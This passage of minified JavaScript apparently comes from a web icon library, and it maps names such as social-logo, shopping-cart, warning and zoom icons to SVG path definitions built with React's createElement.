20c5.523 0 10-3.806 10-8.5S17.523 3 12 3 2 6.806 2 11.5c0 2.78 1.571 5.25 4 6.8v3.2l3.211-1.835A11.66 11.66 0 0 0 12 20Zm-3-9.5h6m-5 3h4"})),messege_comment_8_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14.5 18.703c-4.142 0-7.5-3.292-7.5-7.352C7 7.291 10.358 4 14.5 4c4.142 0 7.5 3.291 7.5 7.351 0 2.405-1.178 4.54-3 5.882V20l-2.408-1.587a7.645 7.645 0 0 1-2.092.29Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.352 5.55A7.131 7.131 0 0 0 8.5 5.5C4.91 5.5 2 8.174 2 11.473c0 1.954 1.021 3.69 2.6 4.779V18.5l2.087-1.29a7.04 7.04 0 0 0 2.813.166c.169-.024.336-.054.5-.09"})),messenger_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 22c5.523 0 10-4.477 10-10S17.523 2 12 2 2 6.477 2 12c0 1.834.494 3.553 1.355 5.03L2 22l4.818-1.445A9.954 9.954 0 0 0 12 22Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m7 13.75 3-3 3.5 3 3.5-3.5"})),microsoft_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Zm9-2v18m-9-9h18"})),middle_align_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M3 3h18M8 21h8M3 15h18M8 9h8"})),mobile_smartphone_phone_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M17 2H7a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h10a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2Zm-6.5 3h3"})),pause_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h2.5a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Zm11.5 0a2 2 0 0 1 2-2H19a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2h-2.5a2 2 0 0 1-2-2V5Z"})),pinterest_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 11 8 21m1.818-4.5A5 5 0 1 0 7.416 14"}),(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"})),play_media_video_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 2c5.522 0 10 4.477 10 10s-4.478 10-10 10C6.477 22 2 17.523 2 12S6.477 2 12 2Z",clipRule:"evenodd"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m16 12-6-4v8l6-4Z"})),price_tag_label_category_sale_discount_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12.328 2.5H20.5a1 1 0 0 1 1 1v8.172a2 2 0 0 1-.586 1.414l-8 8a2 2 0 0 1-2.829 0l-7.171-7.172a2 2 0 0 1 0-2.828l8-8a2 2 0 0 1 1.414-.586Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M18 7.5a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m8 13 3 3"})),price_tag_offer_sale_coupon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15.5 5.5h-3.672a2 2 0 0 0-1.414.586l-6.5 6.5a2 2 0 0 0 0 2.828l6.171 6.172a2 2 0 0 0 2.829 0l6.5-6.5A2 2 0 0 0 20 13.672V6.5a1 1 0 0 0-1-1h-.5M8 14.5l3 3m-.5-4.5 2 2"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16 9c4.5-2.5 1.655-7.99-2.766-6.817-2.752.73-5.916 1.27-9.234 0"})),reddit_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M12 9c-4.97 0-9 2.91-9 6.5S7.03 22 12 22s9-2.91 9-6.5S16.97 9 12 9Zm0 0V6a2 2 0 0 1 2-2h3m3.506 9.37a2.25 2.25 0 1 0-2.856-2.93M17 4a2 2 0 1 0 4 0 2 2 0 0 0-4 0ZM3.494 13.37a2.25 2.25 0 1 1 2.856-2.93"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M8.5 16.75c1.5 1.5 5.5 1.5 7 0M15 13h.01M9 13h.01"})),refresh_reset_cycle_loop_infinity_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M21 12a9 9 0 0 1-17 4.127M3 12a9 9 0 0 1 17-4.127M20 3v5h-5M4 21v-5h5"})),restriction_no_stop_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 19 19 5"})),right_align_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M3 3h18m-8 18h8M3 15h18m-8-6h8"})),right_triangle_angle_play_arrow_forward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M17.933 12.8a1 1 0 0 0 0-1.6L8.6 4.2A1 1 0 0 0 7 5v14a1 1 0 0 0 1.6.8l9.333-7Z"})),search_magnify_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 19a8 8 0 1 0 0-16 8 8 0 0 0 0 16Zm10 2-4.35-4.35"})),settings_tool_function_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.55 2.778A1 1 0 0 1 10.523 2h2.953a1 1 0 0 1 .975.778l.355 1.562a2 2 0 0 0 2.538 1.468l1.627-.5a1 1 0 0 1 1.155.447l1.456 2.464a1 1 0 0 1-.193 1.253l-1.16 1.04a2 2 0 0 0 0 2.978l1.16 1.038a1 1 0 0 1 .193 1.254l-1.456 2.464a1 1 0 0 1-1.155.447l-1.627-.5a2 2 0 0 0-2.538 1.468l-.355 1.56a1 1 0 0 1-.976.779h-2.952a1 1 0 0 1-.975-.778l-.355-1.562a2 2 0 0 0-2.538-1.468l-1.628.5a1 1 0 0 1-1.154-.446l-1.456-2.464a1 1 0 0 1 .193-1.254l1.16-1.038a2 2 0 0 0 0-2.979L2.61 9.472a1 1 0 0 1-.194-1.253l1.456-2.464a1 1 0 0 1 1.155-.447l1.628.5A2 2 0 0 0 9.194 4.34l.355-1.562Z"}),(0,a.createElement)("circle",{cx:"12",cy:"12",r:"3",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"})),share_social_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.968 10.591a3.15 3.15 0 1 0 0 2.818m0-2.818c.212.424.332.902.332 1.409s-.12.985-.332 1.409m0-2.818 7.013-3.507M8.968 13.41l7.013 3.507m0-9.832a2.7 2.7 0 1 0 4.637-2.769 2.7 2.7 0 0 0-4.637 2.77Zm0 9.832a2.7 2.7 0 1 0 4.637 2.769 2.7 2.7 0 0 0-4.637-2.77Z"})),shopping_cart_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 3h2.128a1 1 0 0 1 .991.863l1.762 12.774a1 1 0 0 0 .99.863H18.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.5 19.25a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0Zm9.75 0a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0ZM5.5 5h15.304a1 1 0 0 1 .984 1.177l-1.152 6.403a1 1 0 0 1-.898.82L7 14.5"})),skype_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 3c-.415 0-.823.028-1.223.082a5.5 5.5 0 0 0-7.695 7.695 9 9 0 0 0 10.14 10.14 5.5 5.5 0 0 0 7.695-7.695A9 9 0 0 0 12 3Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15 10c0-1-1-2-3-2s-3 1-3 2c0 2.5 6 1.5 6 4 0 1-1 2-3 2s-3-1-3-2"})),smile_emoji_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 8.5V10m7-1.5V10m-8.271 4a5.002 5.002 0 0 0 9.542 0"})),social_community_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14.632 5.032a8.446 8.446 0 0 1 5.79 8.024 8.5 8.5 0 0 1-.18 1.74M9.368 5.031a8.446 8.446 0 0 0-5.79 8.024c.001.596.063 1.178.18 1.74m13.915 4.5c.458.387 1.05.62 1.695.62A2.635 2.635 0 0 0 22 17.279a2.635 2.635 0 0 0-2.632-2.64 2.635 2.635 0 0 0-2.631 2.64c0 .81.364 1.534.936 2.018Zm0 0A8.378 8.378 0 0 1 12 21.5a8.378 8.378 0 0 1-5.673-2.204m0 0a2.636 2.636 0 0 0 .936-2.018 2.635 2.635 0 0 0-2.631-2.64A2.635 2.635 0 0 0 2 17.279a2.635 2.635 0 0 0 2.632 2.639c.645 0 1.237-.234 1.695-.62ZM14.632 5.14A2.635 2.635 0 0 1 12 7.778a2.635 2.635 0 0 1-2.632-2.64A2.635 2.635 0 0 1 12 2.5a2.635 2.635 0 0 1 2.632 2.639Z"})),square_rounded_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"})),star_rating_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.579",d:"M11.016 3.125c.387-.833 1.58-.833 1.968 0l2.136 4.602c.158.34.482.573.856.617l5.067.597c.918.108 1.286 1.233.608 1.856l-3.748 3.444a1.07 1.07 0 0 0-.326.998l.994 4.974c.18.9-.785 1.595-1.592 1.147l-4.45-2.475a1.09 1.09 0 0 0-1.059 0L7.02 21.36c-.806.448-1.771-.247-1.591-1.147l.994-4.974a1.07 1.07 0 0 0-.326-.998l-3.749-3.444c-.677-.623-.309-1.748.609-1.856l5.067-.597c.374-.044.698-.278.856-.617l2.136-4.602Z"})),stopwatch_reading_time_timer_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M21 13a9 9 0 1 1-18 0 9 9 0 0 1 18 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 7.5V13l3.5 2.5M12 4V1.5m-2 0h4M21 6l-2-2"})),tablet_ipad_pad_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2Zm-6 3h.01"})),tag_bookmark_save_favourite_mark_discount_sale_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 4v18l6.8-5.1a2 2 0 0 1 2.4 0L20 22V4a2 2 0 0 0-2-2H6a2 2 0 0 0-2 2Z"})),tiktok_logo_icon_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.182 11.083C8.425 11.083 7 12.52 7 14.292S8.425 17.5 10.182 17.5s3.182-1.436 3.182-3.208V6.5c0 1.375 1.363 3.208 3.636 3.208"})),tiktok_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.182 11.083C8.425 11.083 7 12.52 7 14.292S8.425 17.5 10.182 17.5s3.182-1.436 3.182-3.208V6.5c0 1.375 1.363 3.208 3.636 3.208"})),triangle_rounded_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.274 4.004a1.986 1.986 0 0 1 3.452 0L21.732 18c.763 1.334-.195 2.999-1.726 2.999H3.994c-1.531 0-2.49-1.665-1.726-2.999l8.006-13.997Z"})),triangle_shape_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 20 12 3l10 17H2Z"})),twitter_x_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3 21 7.548-7.548M21 3l-7.548 7.548m0 0L8 3H3l7.548 10.452m2.904-2.904L21 21h-5l-5.452-7.548"})),upload_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7.822 8.067A5 5 0 0 0 6 17.9m12.633-5.658A7 7 0 1 0 5.248 8.147M19 9.756a4.502 4.502 0 0 1-.195 8.552M12 21v-8m0 0-2.5 2.5M12 13l2.5 2.5"})),view_count_show_visible_eye_open_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 15a5 5 0 1 0 0-10 5 5 0 0 0 0 10Z"})),view_count_show_visible_eye_open_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 15a3 3 0 1 0 0-6 3 3 0 0 0 0 6Z"})),view_count_show_visible_eye_open_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12c6-8.667 16-8.667 22 0-6 8.667-16 8.667-22 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 12a6 6 0 1 1-12 0 6 6 0 0 1 12 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15 12a3 3 0 0 0-3-3"})),view_count_show_visible_eye_open_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 9c-1.996-3.913-6-6-10-6S3.996 5.087 2 9"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 21a7 7 0 0 0 6.308-10.038 2.5 2.5 0 1 1-3.27-3.27A7 7 0 1 0 12 21Z"})),view_count_show_visible_eye_open_5_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 17a5 5 0 0 0 5-5h-5V7a5 5 0 0 0 0 10Z"})),warning_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 22c5.523 0 10-4.477 10-10S17.523 2 12 2 2 6.477 2 12s4.477 10 10 10Zm0-14v4.5m0 3v.5"})),warning_triangle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.274 4.004a1.986 1.986 0 0 1 3.452 0L21.732 18c.763 1.334-.195 2.999-1.726 2.999H3.994c-1.531 0-2.49-1.665-1.726-2.999l8.006-13.997ZM12 9v4.5m0 3v.5"})),whatsapp_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12.806 14.02c-.849-.282-1.532-.824-1.768-1.06-.236-.235-.778-.919-1.06-1.767l1.202-1.91L9.553 5.96c-.943 0-3.04.778-3.323 3.323-.283 2.546 1.532 5.068 2.475 6.01.942.944 3.464 2.759 6.01 2.476 2.546-.283 3.323-2.381 3.323-3.324l-3.323-1.626-1.91 1.202Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 2c5.523 0 10 4.477 10 10s-4.477 10-10 10a9.953 9.953 0 0 1-5.183-1.446L2 22l1.445-4.818A9.953 9.953 0 0 1 2 12C2 6.477 6.477 2 12 2Z"})),wordpress_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7 7.454H3.818"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 12c0 5.523-4.477 10-10 10S2 17.523 2 12 6.477 2 12 2s10 4.477 10 10Zm-6.137 9.318 5.228-13.636m-3.864 9.772-4.09-10m-3.41 0 5.455 13.864"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.117 17.322 6.09 7.454H3.223m-.303.605 5.217 13.26"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.045 7.454h5M8.59 21.318l3.183-8.409M19.5 5.41h-.334a2.273 2.273 0 0 0-2.123 3.083l1.775 4.643"})),youtube_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10 15V9l5 3-5 3Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M19.193 4.352c-3.627-.47-10.402-.47-14.213.004-1.456.18-2.57 1.446-2.757 3.168-.297 2.719-.297 6.233 0 8.952.188 1.722 1.301 2.988 2.757 3.168 3.811.473 10.586.475 14.213.004 1.36-.177 2.375-1.365 2.562-2.972.327-2.811.327-6.541 0-9.352-.187-1.607-1.202-2.795-2.562-2.972Z"})),full_screen_corners_out_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3 8.5V5C3 3.89543 3.89543 3 5 3H8.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M3 15.5V19C3 20.1046 3.89543 21 5 21H8.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M21 8V5C21 3.89543 20.1046 3 19 3H15.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M21 15.5V19C21 20.1046 20.1046 21 19 21H15.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),zoom_in_magnifying_glass_plus_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M11 19C15.4183 19 19 15.4183 19 11C19 6.58172 15.4183 3 11 3C6.58172 3 3 6.58172 3 11C3 15.4183 6.58172 19 11 19Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M21.0004 21L16.6504 16.65",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M10.995 8V14M8 11.005L14 11.005",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),zoom_out_magnifying_glass_minus_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M11 19C15.4183 19 19 15.4183 19 11C19 6.58172 15.4183 3 11 3C6.58172 3 3 6.58172 3 11C3 15.4183 6.58172 19 11 19Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M21.0004 21L16.6504 16.65",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M8 11.005L14 11.005",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),plugin_connect_socket_integration_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M21.5 2.5L18.5 5.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M18 12.9999L20.5858 10.4142C21.3668 9.63311 21.3668 8.36678 20.5858 7.58573L16.4142 3.41416C15.6332 2.63311 14.3668 2.63311 13.5858 3.41416L11 5.99994",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M5.9997 11L3.41391 13.5858C2.63286 14.3668 2.63286 15.6332 3.41391 16.4142L7.58549 20.5858C8.36653 21.3668 9.63286 21.3668 10.4139 20.5858L12.9997 18",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M2.5 21.5L5.5 18.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4.5 9.5L14.5 19.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M9.5 4.5L19.5 14.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M7 12L9.5 9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12 17L14.5 14.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),rocket_fly_boost_launch_pro_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M20.8991 2.5H21.5V3.10086C21.5 6.28346 19.7357 9.83572 17.4853 12.0862L13.5714 16L8 10.4286L11.9139 6.51473C14.1643 4.26429 17.7165 2.5 20.8991 